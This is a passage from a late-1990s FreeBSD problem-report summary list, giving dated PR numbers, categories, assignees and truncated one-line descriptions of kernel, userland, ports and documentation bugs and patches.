[1999/09/30] kern/14060 3.3-STABLE on primary mail server panics o [1999/09/30] bin/14069 Buffer overflow in mail(1) o [1999/09/30] kern/14072 Rebooting in FreeBSD 3.3 wipes out known o [1999/10/01] conf/14075 CDROM not being recognized during certain o [1999/10/02] kern/14096 parallel port -- ppi -- driver broken aft o [1999/10/02] conf/14098 routing problem on DHCP client with netwo o [1999/10/03] bin/14102 make world -DWANT_AOUT fails in lib/compa o [1999/10/04] misc/14121 resurfaced bug in rmt preventing remote d o [1999/10/04] kern/14123 lnc driver is not working o [1999/10/04] ports/14128torstenb Wrong group and mode on postdrop program o [1999/10/04] i386/14135 lpt1 nolonger exists after 3.2-RELEASE o [1999/10/05] kern/14144 bad conversions in kern_fork() o [1999/10/05] ports/14153obrien xwpe has no distribution tar file o [1999/10/06] docs/14173 doc bind(2) sets errno to undocumented EAGAIN o [1999/10/07] misc/14178 FreeBSD 3.2 - Calls from CGI scripts, cro o [1999/10/07] kern/14183 bridge forwarding corrupted broadcast IP o [1999/10/07] ports/14186se kdebase11 package not compiled correctly o [1999/10/07] bin/14202 tgetstr() inserting termlib "%pn" into ou o [1999/10/08] ports/14213ports opendx port does not run o [1999/10/09] kern/14226 panic: no mbufs o [1999/10/10] bin/14250 restore(8) can loop if tty goes away or w o [1999/10/11] misc/14264 Combination of aio_read(), pthread_cond_w o [1999/10/12] i386/14282 Using FreeBSD 3.* ThinkPad 600E doesn't r o [1999/10/12] ports/14283ports apache13 htpasswd dumps core o [1999/10/12] kern/14285 dillon NFS client appears to lose data o [1999/10/12] ports/14292ports tkfont does not work with XiG X-server o [1999/10/14] i386/14324 wst OR atapi drivers won't work o [1999/10/14] misc/14326 kerberos4 pam-related breakage in current o [1999/10/14] misc/14327 names used in netdb.h may conflict with n o [1999/10/14] ports/14328ports update pipsecd port to version 19991014 o [1999/10/14] i386/14334 imp AHA-1542A not supported by FreeBSD 3.x (" o [1999/10/14] ports/14340ports update ports: gd 1.6.3 -> 1.7.3 o [1999/10/15] kern/14354 grog vinum cannot compile for alpha o [1999/10/17] i386/14372 The audio ioctl SNDCTL_DSP_SETFMT affects o [1999/10/17] ports/14386ports new ports o [1999/10/17] ports/14387ports new ports o [1999/10/17] ports/14388ports new ports o [1999/10/18] ports/14397ports Apple's RTSP proxy does not connect UDP p o [1999/10/18] ports/14398ports NEW PORT: mod_dav module for Apache o [1999/10/18] ports/14400ports update ports: t1lib to 0.9.2 693 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- a [1995/01/11] i386/105 bde Distributed libm (msun) has non-standard s [1995/05/13] bin/401 Add REMOTE_* variables s [1995/06/15] bin/517 Bad group change with 'install' o [1995/07/09] misc/605 wpaul NIS: get*bynis routine problems s [1995/08/05] gnu/655 ld -r of shared objects worked in 1.1.5, s [1995/08/07] bin/658 ifconfig alias has to be separately given s [1995/09/26] kern/742 syslog errors accessing Mac hard disks [p s [1995/10/03] kern/765 umount -f can`t umount a NFS filesystem i s [1995/11/20] kern/831 one minor complaint about the kernel visu s [1995/11/27] bin/841 stale nfs mounts cannot be umounted o [1995/11/30] bin/854 dg swapinfo shows incorrect information for a [1996/01/30] bin/981 fenner clnt_broadcast() is not aware of aliases s [1996/03/20] kern/1090 iostat displays incorrect sps count s [1996/03/20] bin/1093 route's diagnostic is weird o [1996/04/06] kern/1119 dg Mounted EXT2FS partition is not cleanly u s [1996/06/11] bin/1312 automounter hangs on boot s [1996/06/13] bin/1320 dump limits blocksize to 32K s [1996/07/07] bin/1375 jraynard Extraneous warning from mv(1) [PATCH] o [1996/07/24] misc/1428 ncurses doesn't always display ALTCHARSET o [1996/09/06] bin/1577 peter mail -f foo does not look in current dire s [1996/09/08] bin/1589 [PATCH] ftp fails to flush output o [1996/09/14] gnu/1611 phk groff should use "system-wide" papersize s [1996/09/19] kern/1654 [PATCH] In procfs, vattr doesn't contain o [1996/09/23] i386/1671 joerg s2 map in pcvt isn't ISO 8859-1 and claim s [1996/10/13] misc/1791 syslimits.h does not allow overriding def o [1996/10/20] bin/1849 gdb sets library breakpoints on the wrong s [1996/10/24] bin/1881 file(1) misidentifies Sun3/m68k executabl s [1996/11/01] bin/1941 danny wtmp and monthly rotation s [1996/11/01] bin/1943 route(8) args s [1996/11/04] gnu/1961 [PATCH] uucp logging files are in /var/sp s [1996/11/06] bin/1970 csh limtail() bug s [1996/11/16] bin/2036 cpio size wraparound s [1996/11/19] bin/2061 DEBUG_FLAGS in bsd.lib.mk is broken s [1996/11/19] bin/2065 in tzsetup/sysinstall, allow user to type s [1996/11/22] bin/2090 clients may bind to FreeBSD ypserv refusi s [1996/11/28] bin/2119 [PATCH] mount lies to child about argv0, s [1996/12/02] bin/2137 vm statistics are bad s [1996/12/12] kern/2199 joerg [PATCH] Got a lots of "Target Busy" messa s [1996/12/14] bin/2216 [PATCH] Ada specs not being compiled into o [1996/12/17] i386/2239 jmg some interrupts take too long (i.e. BT946 a [1996/12/21] bin/2265 guido su(1) does not call skeyaccess() o [1996/12/24] kern/2273 dufault support for POSIX.4 / POSIX.1a RT-schedul s [1996/12/27] kern/2298 Support for DSR/DCD swapping on serial po a [1996/12/27] misc/2302 brandon new crypt() including SHS and an extendab o [1996/12/29] bin/2315 peter tail segfaults on NFS permission denied s [1996/12/30] kern/2327 [PATCH] `Green' saver for pcvt o [1997/01/10] bin/2442 davidn setusershell()/endusershell() missing o [1997/01/14] kern/2492 AIMS Lab RadioTrack driver for FreeBSD 2. o [1997/01/26] i386/2598 ep0 in EISA mode hangs if ep0-device (ISA o [1997/01/28] bin/2603 dufault Added POSIX.4/POSIX.1b constants in unist o [1997/01/28] bin/2604 dufault Added POSIX.4/POSIX.1b shm_open()/shm_unl o [1997/02/02] gnu/2637 tar dumped core with -g option. a [1997/02/02] bin/2641 wpaul login_access.c doesn't work with NIS by d o [1997/02/05] bin/2668 modification suggested for rarpd o [1997/02/11] kern/2716 od.c/sd.c non 512 byte/sector support imp o [1997/02/14] bin/2737 yppasswd fails to change password on a su o [1997/02/15] misc/2745 fenner PR querry web form doesn't sort correctly o [1997/03/03] kern/2857 DE500 board exhibits capture effect o [1997/03/03] kern/2865 peter NFS client hangs on umount, ls, df when N o [1997/03/06] docs/2897 steve send-pr categories should be explained so o [1997/03/06] bin/2898 fenner arp -a -n buglet o [1997/03/10] bin/2934 sh(1) has problems with $ENV o [1997/03/10] bin/2938 hoek Add -b, -l, and -f options to du(1) o [1997/03/18] misc/3024 make reinstall in /usr/src requires writa o [1997/03/22] kern/3061 route does not accept -genmask o [1997/03/31] gnu/3157 Patches to gas and gdb to support MMX ext o [1997/04/07] bin/3221 rpc.rusersd : can't communicate with SunO o [1997/04/07] misc/3225 [PATCH] uucpd.c should normalize host nam o [1997/04/08] misc/3237 SCRIPTS addition to bsd.prog.mk o [1997/04/09] bin/3242 incorrect prototype for initgroups o [1997/04/14] kern/3281 errors when "rm -r"-ing in a mounted ext2 o [1997/04/14] kern/3282 ext2fs causes fs-unmount at shutdown/rebo o [1997/04/14] bin/3284 [PATCH] symorder(1): -t option doesn´t wo o [1997/04/14] bin/3286 [PATCH] missing error checking in mount_m o [1997/04/14] kern/3287 [PATCH] missing symbols in /usr/src/sys/i o [1997/04/15] kern/3299 /dev/console hangs o [1997/04/17] bin/3314 [PATCH] /etc/daily did not run on April 6 o [1997/04/27] bin/3399 mv of symbolic link can move directory in o [1997/04/29] bin/3416 ibcs emulation problems o [1997/05/05] i386/3504 [PATCH] New features (and manpage) for ne o [1997/05/08] gnu/3552 the -L option of tar does not work proper s [1997/05/09] kern/3571 Mounted ext2 prevents umount of filesyste o [1997/05/12] kern/3584 luigi cleanup TCP_REASS macro in tcp_input.c o [1997/05/16] bin/3608 Telnet in linemode will break apart long o [1997/05/17] kern/3611 Internal CPU cache on CyrixiInstead DX2 d o [1997/05/20] docs/3645 torstenb TCP_wrappers package doesn't mention wher s [1997/05/21] bin/3648 roberto [PATCH] find(1) extension for file flags s [1997/05/22] kern/3667 [PATCH] make vn LKM'able. o [1997/06/02] bin/3762 dufault Bogus return values from rtprio(1) o [1997/06/07] bin/3805 single process tftpd o [1997/06/09] bin/3826 KerberosIV sometimes hangs rcp o [1997/06/10] bin/3837 dufault new feature for rtprio o [1997/06/12] kern/3853 luigi netboot/ns8390.c breaks NS datasheet o [1997/06/14] bin/3866 rcs2log fails with eastern timezones o [1997/06/15] kern/3879 peter Can't export mounted ext2fs via NFS o [1997/06/18] kern/3901 Multicast for Intel 10/100 Ethernet Card o [1997/06/19] misc/3912 ctags(1) cannot trace some macro correctl o [1997/06/23] kern/3938 peter Problem about mmap() over NFS o [1997/06/24] kern/3944 if_le doesnt receive ether multicast pack o [1997/06/25] kern/3948 nonworking t/tcp server side a [1997/06/25] kern/3953 kern-config: options PANIC_REBOOT_WAIT_TI o [1997/06/26] i386/3962 print disk internal cache size during pro o [1997/06/27] kern/3968 Hardware probes die on Peak SBCs. o [1997/06/29] ports/3983 fenner New port: psf toolkit o [1997/07/07] kern/4051 pppd connect 'chat ...' broken s [1997/07/07] kern/4052 VJ compression drops packets with IP+TCP o [1997/07/18] bin/4116 davidn Kerberized login as .root fails to o [1997/07/23] kern/4153 New tcp initial send sequence number code s [1997/07/23] bin/4154 ru wish /bin/sleep handled fractions of a se s [1997/07/24] bin/4157 [PATCH] netstat atalk output should print s [1997/07/26] bin/4172 suggest reconnection option added to fetc s [1997/07/28] kern/4184 [PATCH] minor nits in sys/netatalk s [1997/07/31] bin/4204 [PATCH] ac printed wrong report about tty o [1997/08/04] conf/4229 Ethernet interface unreachable on bootup o [1997/08/06] bin/4238 chpass only occasionally works in conjunc o [1997/08/07] kern/4243 file locking doesn't work for pipe o [1997/08/07] bin/4247 modification to /etc/security for FreeBSD o [1997/08/08] misc/4249 wpaul ypchsh doesn't care about changing a user o [1997/08/12] misc/4285 SDL RISCom/N2 (ISA) o [1997/08/13] kern/4297 dufault SIGEV_NONE and SIGEV_SIGNAL go in signal. o [1997/08/13] i386/4300 msmith The initial timeout on open("/dev/lpt0".. o [1997/08/14] ports/4304 asami Recommendation re. Ports Collection o [1997/08/22] ports/4356 erich sudo shouldn't block signals in tgetpass( o [1997/08/23] conf/4363 kernel build depend on make obj o [1997/08/29] kern/4413 No way to unmount a floppy that goes bad o [1997/08/29] bin/4419 man can display the same man page twice o [1997/08/29] bin/4420 find -exedir doesn't chdir for first entr o [1997/09/03] bin/4459 bde No prototype for moncontrol(3) and monsta o [1997/09/04] misc/4468 dlopen is not available from static execu o [1997/09/07] bin/4484 peter sendmail is barfing o [1997/09/13] kern/4528 processes hang if the mount_portal proces a [1997/09/14] i386/4538 sos byteswapped ATAPI id strings o [1997/09/14] bin/4545 f77 will only call `cc', no com-line opti s [1997/09/15] i386/4547 luigi asc.c and pcaudio.c should use selrecord o [1997/09/16] misc/4556 make can't build executable from single F o [1997/09/21] kern/4597 Patch to pass NPX status word in signal c o [1997/09/21] kern/4601 Contrib: userconfig patch to edit SCSI co o [1997/09/25] bin/4629 calendar doesn't print all dates sometime o [1997/09/28] misc/4646 Can't fixit with an NFS-mounted CD. o [1997/09/29] conf/4654 Need to do post-ifconfig commands o [1997/10/04] bin/4688 peter sys/utsname.h SYS_NMLN 32 too small o [1997/10/05] bin/4696 ping hangs on certain unresolvable hosts o [1997/10/05] bin/4697 make doesn't handle dependencies with for o [1997/10/15] gnu/4771 diff to correct misleading total bytes in o [1997/10/22] bin/4828 ypxfr makes false assumption about RPC ca o [1997/10/24] kern/4845 Boot complains about disk slices in FAT p o [1997/10/24] kern/4847 pccard stuff fails after running Win95 wi o [1997/11/01] bin/4915 peter NFS mounts to linux machine can hang syst o [1997/11/02] bin/4923 vi leaves the screen in standout mode o [1997/11/07] bin/4969 cdcontrol plays incorrect audio tracks in o [1997/11/08] bin/4975 quotaon while server very busy causes loc o [1997/11/09] kern/4992 SCSI disk scheduling disabled in 2.2.5 o [1997/11/10] kern/4997 DDB_UNATTENDED doesn't always work o [1997/11/11] kern/5009 ibcs2 emulation o [1997/11/11] kern/5011 rndcontrol -s 8 causes kernel panic o [1997/11/13] bin/5031 lpr does not remove original file if -s i o [1997/11/13] ports/5034 ache (tcsh) blocked write on named pipe sticks o [1997/11/14] gnu/5039 libdialog fails to resore terminal o [1997/11/14] kern/5040 Support for "SCSI-0" devices o [1997/11/14] kern/5048 Calling shutdown(fd,1) multiple times wil o [1997/11/15] kern/5059 peter mountd, nfsd, etc. fail when lp0 defined o [1997/11/15] kern/5060 Kernel doesn't compile with mss o [1997/11/20] kern/5108 pmap_release panics with 'freeing held pa o [1997/11/20] kern/5110 kernel crash & core in pmap_testbit durin o [1997/11/23] bin/5134 cdcontrol will eject a mounted CDROM o [1997/11/26] misc/5153 jkh release file checksums in wrong file s [1997/11/28] bin/5173 [PATCH] restore ought to deal with root s s [1997/11/30] i386/5182 bde [PATCH] A patch support high speed serial o [1997/12/09] bin/5263 sh bug (with example) s [1997/12/11] kern/5275 [PATCH] Added volume (barcode) support to o [1997/12/14] conf/5292 master.passwd -- /nonexistent vs. /sbin/n s [1997/12/14] bin/5296 slattach fails creating pidfile with ioct o [1997/12/22] kern/5362 peter mount incorrectly reports / as an NFS exp f [1997/12/30] i386/5398 silo overflows running o [1998/01/02] bin/5410 pkg_info options s [1998/01/03] bin/5419 [PATCH] timed rejects valid networks with o [1998/01/08] kern/5429 Ethernet collision during file transfers s [1998/01/08] bin/5444 [PATCH] ypserv uses wrong dns lookup orde o [1998/01/11] bin/5483 Login(1) clears utmp entry o [1998/01/15] kern/5502 nfsd process usage doesn't get accounted o [1998/01/15] kern/5508 SCSI Message sd0: COMMAND FAILED (4 28) @ s [1998/01/16] kern/5510 sos [PATCH] Incomplete ATAPI diagnostic at bo o [1998/01/18] kern/5517 Recursive NULLFS mount causes ufs_ihashge s [1998/01/20] misc/5531 [SUBMISSION] new library function abs2rel s [1998/01/20] kern/5532 [PATCH] Dropped packet counts are inaccur o [1998/01/21] bin/5537 vi dumps core with dodgy exrc file o [1998/01/24] i386/5559 PC-Card joystick ports were not supported o [1998/01/26] kern/5577 bde Unnecessary disk I/O and noatime ffs fixe a [1998/01/28] bin/5591 Trouble with LD_PRELOAD environment varia o [1998/01/31] bin/5609 lpd cannot send long files to HP's JetDir a [1998/02/02] ports/5626 billf 'ldap' port eats all available CPU time o [1998/02/02] kern/5627 Tertiary/Quaternary IDE Ctlrs: A few kern f [1998/02/05] misc/5662 sysinstall generates short dev names for o [1998/02/06] bin/5666 ifconfig fails to add alias o [1998/02/06] kern/5672 Crash from scsi aborted command 'Overlapp o [1998/02/09] kern/5689 sysctl vm.vmmeter - bogus and unsupported o [1998/02/10] bin/5711 bin/cat code cleanup o [1998/02/10] bin/5712 /bin/chio code cleaup and option added o [1998/02/10] bin/5717 pw -D -g "" returns error o [1998/02/10] bin/5718 pkg_delete refuses to run as non-root o [1998/02/14] bin/5745 [PATCH] Add /usr/local/share/mk to defaul o [1998/02/14] bin/5746 bootparamd will not netboot sun 3 compute o [1998/02/14] bin/5747 ld.so error message o [1998/02/15] bin/5758 sys/resources.h doesn't include sys/time. o [1998/02/17] kern/5768 Shutdown aborts syncing, when sync isn't o [1998/02/18] i386/5784 ibcs2 emulation not handling ioctl(..FION o [1998/02/19] ports/5788 joerg pcemu harddisk-access fixes o [1998/02/19] kern/5789 wcd0 requires ATAPI_STATIC o [1998/02/19] kern/5795 Panic: "bremfree: removing a buffer when o [1998/02/20] misc/5803 "tab" function from "ee" not compatible w o [1998/02/25] gnu/5841 installmost or install (world) of tmac fa o [1998/02/25] bin/5847 Makeworld fails if CXXFLAGS is set. s [1998/02/25] misc/5855 /etc/services is out of date with IANA o [1998/02/26] bin/5857 non-functional lpr/lpr o [1998/02/26] kern/5863 Kernel support for sorted SHUTDOWN & SHUT o [1998/03/01] bin/5880 df -t does not support devfs o [1998/03/01] ports/5884 dburr New port: icqjava-0.981a (net/icqjava) o [1998/03/02] bin/5901 new version of `fmt' o [1998/03/03] bin/5912 kinit exits if no user name specified o [1998/03/06] kern/5931 dma errors in syslog with GUS-max o [1998/03/06] i386/5932 perfmon kernel code should check for non- o [1998/03/08] bin/5944 cvs doesn't work correct. o [1998/03/10] kern/5964 peter nfsd send interface selection seems broke o [1998/03/10] ports/5972 andreas x11/fvwm95 requiring gsm, and rplay is a o [1998/03/11] gnu/5982 no error exit code from tar on child fail o [1998/03/12] gnu/5992 cvs y2k o [1998/03/13] bin/6000 kadmin ank uses bad default expiration of o [1998/03/15] bin/6015 indent(1) breaks source with backslash ne o [1998/03/16] kern/6032 poor TCP performance using FDDI over long o [1998/03/18] misc/6060 peter Sendmail executable, not doing MASQUERADE o [1998/03/22] conf/6096 /sys/i386/conf/LINT: edit(???) sound_conf o [1998/03/22] gnu/6107 gdb should support PRINTF_HAS_LONG_LONG o [1998/03/28] bin/6156 Patches to make dump understand ENOSPC o [1998/03/28] bin/6161 2.2.6 kerberos servers are awfully visibl o [1998/03/29] ports/6170 peter another squid ports o [1998/03/30] ports/6181 andy New port: xoj-1.0 o [1998/03/31] bin/6183 quota hangups o [1998/03/31] kern/6184 No error if resulting file pos in lseek i o [1998/04/01] bin/6187 peter mounting nfs directories with -b can caus o [1998/04/03] bin/6200 flex can be upgraded o [1998/04/03] bin/6202 No way to detect removable media. o [1998/04/03] bin/6206 Enhancements to the shutdown program o [1998/04/04] kern/6213 peter NFS-mounted swap (via vnconfig) easily cr o [1998/04/04] bin/6214 ping sometimes cannot be killed with a Co o [1998/04/05] conf/6220 Too few ttyv devices in the -RELEASE syst s [1998/04/06] bin/6223 PST/DST bug in /bin/date o [1998/04/06] ports/6230 rse gfont_mkgdf calls wrong interpreter o [1998/04/06] bin/6234 ypserv -d is broken f [1998/04/07] kern/6247 Gravis UltraSound Classic no longer works o [1998/04/14] kern/6296 IP_HDRINCL sockets force header fields to a [1998/04/14] kern/6299 vmstat -i does not show PnP device interr s [1998/04/15] bin/6314 [PATCH] /usr/sbin/ac modification s [1998/04/16] ports/6315 kuriyama new port request: korean/htm o [1998/04/16] kern/6318 pppd does not update wtmp on hangup o [1998/04/16] misc/6320 Sometimes nohup isn't good enough. o [1998/04/17] bin/6332 bde /usr/include/time.h doesn't compile with o [1998/04/17] gnu/6338 Gnu tar not working properly with the -G o [1998/04/18] conf/6346 Kernel version strings need to relate to o [1998/04/20] bin/6359 routed does sent router discovry solicita s [1998/04/20] bin/6371 [PATCH?] fetch(1) uses HTTP_PROXY for ftp a [1998/04/27] kern/6432 IFF_NOARP does not affect ethernet interf o [1998/04/28] ports/6445 jkoshy New port: `fhist' o [1998/04/30] kern/6464 tcpdump doesn't recognize tun0 when it's o [1998/05/03] kern/6495 Need pci_unmap_mem and pci_unmap_port rou s [1998/05/04] bin/6509 [ALMOST PATCH] Allow dd to seek/skip to o s [1998/05/05] bin/6521 [MAYBE PATCH] "rmdir -p x/y/z/" fails o [1998/05/07] kern/6544 luigi Only get one channel through sound card o [1998/05/07] ports/6546 ache 3line ansi prompt in tcsh: cursor disappe o [1998/05/11] i386/6595 Old IP address persistent after change o [1998/05/12] misc/6612 bsd.man.mk can't handle man pages with ": o [1998/05/13] kern/6623 non-root user can crash system if disconn o [1998/05/13] conf/6624 davidn One class with nologin=/etc/nologin: reje o [1998/05/15] kern/6651 peter Possible NFS deadlock clue s [1998/05/16] bin/6658 [PATCH] -stable getcwd(3) performs unnece s [1998/05/17] kern/6668 [PATCH] new driver: Virtual Ethernet driv a [1998/05/26] misc/6759 phk buggy code in libdisk.a's disk.c o [1998/05/26] kern/6760 can't compile kernel w/o networking o [1998/05/26] kern/6769 peter panic: nfs rcvunlock s [1998/05/29] kern/6781 [PATCH] exabyte changer doesn't grok LUNs s [1998/05/29] bin/6785 place for all the default dump flags f [1998/05/31] ports/6813 fenner patched audio module for vat port o [1998/06/01] ports/6815 torstenb ssh lookup ignores second IP address o [1998/06/01] kern/6820 cd9660_mount NULL pointer deref for no CD o [1998/06/06] kern/6874 accounting prevents transition to multi u o [1998/06/13] misc/6936 sysinstall: install from MS-DOS MO divece o [1998/06/18] kern/6981 CD unmount w/o CD in drive can cause pani s [1998/06/19] bin/6995 [patch] Minor flaw in fdformat s [1998/06/19] bin/6997 [patch] vnconfig "open" error message con s [1998/06/21] kern/7014 [PATCH][STABLE] Add support for SiS 5591 o [1998/06/22] bin/7021 asami Size estimation patches to pkg_* o [1998/06/22] bin/7022 asami changes to bsd.port.mk to accompany PR bi o [1998/06/22] bin/7023 asami bsd.port.(%|subdir.).mk patches for size f [1998/06/23] kern/7029 gibbs cdrecord and aic7880 troubles f [1998/06/23] i386/7031 Our RocketPort port does not support DEVF s [1998/06/24] kern/7044 [PATCH] WaveLAN (2.4G, ISA, full-length b o [1998/06/25] docs/7065 wosch FreeBSD webpages -> applications, port br f [1998/06/25] bin/7068 markm /usr/bin/perl: library path addition s [1998/06/28] kern/7095 [stable] Gravis MAX in 2.2.6 suffers from s [1998/06/28] i386/7100 integrate pcvt configuration into the /et s [1998/06/29] bin/7117 flex -I option is broken s [1998/07/01] bin/7136 kerberized telnetd doesn't use gettytab % s [1998/07/02] kern/7146 The PCCARD doesnt recognize cards in top s [1998/07/06] bin/7184 /usr/games/robots fails to write high sco s [1998/07/08] kern/7210 [PATCH] od(4) bug fixes and enhancements, s [1998/07/10] misc/7232 Suggestion for FreeBSD installation dialo o [1998/07/10] kern/7234 yokota keyboard problems during login immediatel f [1998/07/10] misc/7239 ping(8) and traceroute(8) may report erra o [1998/07/12] bin/7265 A warning flag is added to ln(1). o [1998/07/13] ports/7268 asami MASTER_SITE_OVERRIDE works more better o [1998/07/14] kern/7282 some old and rarely used drivers have app o [1998/07/14] ports/7283 ache tcsh / LC_CTYPE - obscure problem. o [1998/07/15] bin/7287 Incorrect domain name for MAP_UPDATE in m o [1998/07/16] bin/7298 Improvements to ln(1). a [1998/07/19] bin/7324 wosch Suggestions for minor modifications to ad o [1998/07/21] bin/7352 libc generates spurious warnings when use a [1998/07/23] ports/7375 dburr New port request: audio/xsplay f [1998/07/23] kern/7377 we have a new digiboard driver supporting s [1998/07/29] i386/7426 Bugs in macro definitions of pthreads. a [1998/07/31] docs/7456 doc dialog(3) man page outdated o [1998/08/01] ports/7464 dburr New port: WMakerconf o [1998/08/03] ports/7485 andy New port: Xterminal-0.2 s [1998/08/09] kern/7546 [PATCH] [STABLE ?]shutdown -p - system po f [1998/08/12] kern/7589 Tulip Driver parses SROM contents wrong f [1998/08/13] conf/7606 [PATCH] NIS Makefile.dist: NOPUSH replace o [1998/08/14] kern/7619 odd nfs server not responding messages ap o [1998/08/16] ports/7628 dburr new port: sajber-jukebox o [1998/08/16] bin/7632 Race condition in /stand/sysinstall f [1998/08/16] i386/7633 panic: page fault on install with boot.fl s [1998/08/18] bin/7669 libalias does not IRC DCC packets under c o [1998/08/19] ports/7680 billf New port of tn5250 o [1998/08/19] gnu/7687 description of default baud rate for cu c o [1998/08/20] kern/7693 Misleading warning in cblock_alloc_cblock o [1998/08/20] bin/7694 bogus error-message from route(8) o [1998/08/22] kern/7722 Changes to acct format o [1998/08/23] bin/7728 ftpd processes hang o [1998/08/27] bin/7753 arp command fails silently on invalid pro o [1998/08/28] misc/7771 Debugging putenv/getenv o [1998/08/29] ports/7774 torstenb sshd doesn't refuse to login people with o [1998/08/29] bin/7779 [PATCH] modload should detect stripped ke o [1998/08/30] kern/7782 Kernel rebuild not correctly responding t o [1998/08/30] bin/7786 quota.h has superfluous semicolon in macr a [1998/08/31] docs/7791 doc ipf(1) and ipfstat(1) should have been ip o [1998/09/01] gnu/7800 tar(1) does not recognize --gunzip option o [1998/09/02] i386/7816 dfr [Patch] NE2000 PnP card IDs to sys/i386/i o [1998/09/03] bin/7826 ls(1) knows too much about format of strf o [1998/09/03] bin/7828 Add a command line option to cp to make i o [1998/09/05] kern/7837 patches to add a p_auth extension pointer o [1998/09/07] ports/7845 tg Unbuffered /dev/vx0-output from Python 1. o [1998/09/07] bin/7846 /sbin/mount_* do not canonicalize the mou o [1998/09/07] misc/7850 lt_LT.* locale o [1998/09/07] kern/7856 Patches to add lkm hooks to cmsg_data anc o [1998/09/08] bin/7860 Extra option to pr(1). s [1998/09/08] bin/7868 [almost patch]Morse Code Fixups o [1998/09/08] bin/7869 Improved error messages from apm o [1998/09/09] misc/7873 poor initial configuration and documentat o [1998/09/11] bin/7895 multiple identical NFS mounts accepted o [1998/09/11] kern/7903 unmatched '{}' blocks. o [1998/09/13] docs/7914 doc no elf(5) manpage o [1998/09/15] ports/7932 torstenb man zshall doesn't work o [1998/09/16] misc/7946 ccdconfig gives confusing error when give o [1998/09/17] bin/7962 /usr/bin/ee prompts "save changes" when f o [1998/09/18] bin/7973 lpd: Bad control file owner in case of re o [1998/09/19] kern/7990 patch - teach kernel about RB_POWEROFF fl o [1998/09/19] ports/7992 ports New port: xemacs20-stepwise (XEmacs20 hac o [1998/09/20] bin/7998 pkg_add seems to have unneeded umask o [1998/09/20] misc/8005 yokota Keyboard freezes going from KDE to text m o [1998/09/21] kern/8015 [patch] Some sysctl descriptions for the o [1998/09/24] ports/8042 torstenb If pidentd dies, you must kill all telnet o [1998/09/26] bin/8060 install ignores the +X mode flag o [1998/09/27] conf/8061 profiling utilities seperate from profili o [1998/09/27] ports/8063 asami [PATCH] Add multiple CDROM support to bsd o [1998/09/29] bin/8084 NIT: non-working code in rshd o [1998/10/02] i386/8131 [patch] Support for PCI NE2000 compatible o [1998/10/03] misc/8133 markm [patch] bug in telnetd (Kerberos IV) o [1998/10/03] bin/8134 End of game is not recognised immediately o [1998/10/03] misc/8139 [patch] missing /usr/src/share/examples/d o [1998/10/04] bin/8142 freebsd 2.2.7 implementation of key(1) [s o [1998/10/04] i386/8146 [patch] kzipboot serial console setup and a [1998/10/06] bin/8163 [patch] It is impossible to assign quotas o [1998/10/06] bin/8164 [patch] repquota incorrectly reports quot o [1998/10/06] i386/8171 [patch] Intel EtherExpress Pro 100 suppor o [1998/10/07] misc/8202 semop() is not wrapped for thread safety o [1998/10/08] bin/8211 Script to search kernel for an address o [1998/10/12] bin/8295 order of options in printcap causes some o [1998/10/13] conf/8303 3.0-981009-BETA can't make swap device on o [1998/10/13] kern/8311 kernel panic on de0 o [1998/10/16] misc/8346 Strftime can't generate ISO-8601 timezone o [1998/10/16] bin/8347 /usr/lib/compat build issues in 3.0 RELEA o [1998/10/16] kern/8349 [PATCH] Changer definition for SureStore f [1998/10/17] misc/8357 Segmentation fault while making SWARM-1.3 o [1998/10/19] kern/8376 CLOCK_VIRTUAL not implemented o [1998/10/19] misc/8378 Is termcap not maintained enough ? o [1998/10/22] kern/8420 __getcwd() from an (forcibly) unmounted f o [1998/10/24] misc/8434 boot.flp /bin/init crashes during probe w o [1998/10/24] i386/8436 boot.flp sysinstall crashes when probing o [1998/10/24] bin/8438 ex/vi: Error: tcsetattr: Interrupted syst o [1998/10/25] kern/8444 hm pcvt with more than 8 virtual consoles o [1998/10/25] docs/8445 doc Update of "Installing Mathematica on Free o [1998/10/27] i386/8474 repquota does not pick up NIS information o [1998/10/28] bin/8479 Final \'s in /etc/exports did not work in o [1998/10/30] kern/8498 Race condition between unp_gc() and accep o [1998/10/30] bin/8501 snake has a segmentation fault depending o [1998/10/30] conf/8517 rc.conf/rc fails to set ldconfig -aout o [1998/10/31] misc/8519 Murphy's Laws o [1998/11/01] conf/8531 sysinstall on 3.0-RELEASE (and 3.0-curren o [1998/11/03] bin/8553 /usr/libexec/mail.local doesn't handle "> o [1998/11/04] i386/8571 Bug in config utility in FreeBSD 2.2.6-RE o [1998/11/07] kern/8589 incorrect spelling for "dependency" and " o [1998/11/07] i386/8598 MAKEDEV fails if not run from current dir o [1998/11/08] kern/8604 ps u gets confused about process start ti o [1998/11/08] kern/8605 ipsec for ipv4, new version o [1998/11/08] ports/8620 asami New option to colorls - -K, color only to o [1998/11/09] bin/8631 pci interrupts are shown on EISA only mac o [1998/11/09] kern/8633 TCP packet via SLIP/CSLIP containing this s [1998/11/12] kern/8661 stb sys/netatalk/at_control.c needs to correc o [1998/11/12] bin/8666 X blocks serial port with getty process o o [1998/11/13] gnu/8679 tar man page should be updated o [1998/11/14] bin/8681 other macro name that has same number is o [1998/11/18] ports/8754 se KDE: KDM Display Manager has login proble o [1998/11/18] bin/8756 'pw' command additional feature request o [1998/11/19] misc/8764 pwd_mkdb is slow on many users o [1998/11/19] docs/8765 dwhite some suggested text for describing passwo o [1998/11/22] bin/8809 fdisk calls QNX-4 partitions unknown o [1998/11/22] bin/8811 Problem to use 'NLSMODE' variable in Make a [1998/11/25] ports/8864 ports useradd - system V compatible implementat o [1998/11/27] i386/8867 /stand/sysinstall core dumps (signal 11) o [1998/11/28] bin/8881 billf mv missing verbose switch o [1998/11/29] kern/8895 DEC 21152 PCI-PCI bridge chip isn't probe o [1998/11/29] kern/8898 PCI devices without an associated driver o [1998/11/30] bin/8913 negative time values for csh 'time' built o [1998/12/01] i386/8923 ctm 2.2.5 -> 2.2.7 error hu_HU.ISO_8859- o [1998/12/01] kern/8925 options kern file needs AWE_DEFAULT_MEM_S o [1998/12/03] i386/8953 BINFORMAT not defined in 2.2-STABLE o [1998/12/03] bin/8955 request CVS allow advisory locks on repos o [1998/12/06] misc/8986 install-info breaks installworld over nfs o [1998/12/06] bin/8989 (patch) chflags support for mtree(8) o [1998/12/08] bin/9012 route add -host hostIP -interface localIP o [1998/12/10] conf/9051 2.2.8R boot floppy won't write to fixit f o [1998/12/11] bin/9055 When used without arguments, ``set'' and a [1998/12/12] bin/9064 n_hibma [PATCH] propose adding `direct' option in o [1998/12/14] bin/9078 tunefs cant access mounted devices (vs. m o [1998/12/15] kern/9092 DELF raid volumes cause panics under 